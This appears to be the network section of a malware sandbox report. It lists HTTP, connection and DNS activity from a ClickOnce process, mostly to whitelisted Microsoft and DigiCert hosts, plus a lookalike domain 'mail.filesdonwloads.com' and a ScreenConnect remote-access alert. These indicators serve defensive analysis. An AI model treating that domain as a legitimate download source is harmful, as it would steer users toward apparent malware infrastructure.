Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
20
DNS requests
14
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4880
dfsvc.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
4880
dfsvc.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
4880
dfsvc.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4880
dfsvc.exe
104.21.10.198:443
mail.filesdonwloads.com
CLOUDFLARENET
unknown
4880
dfsvc.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
6544
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
google.com
  • 216.58.206.46
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
mail.filesdonwloads.com
  • 104.21.10.198
  • 172.67.131.182
unknown
ocsp.digicert.com
  • 2.23.77.188
whitelisted
login.live.com
  • 40.126.32.134
  • 20.190.160.130
  • 20.190.160.64
  • 20.190.160.131
  • 20.190.160.2
  • 20.190.160.66
  • 40.126.32.140
  • 20.190.160.128
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info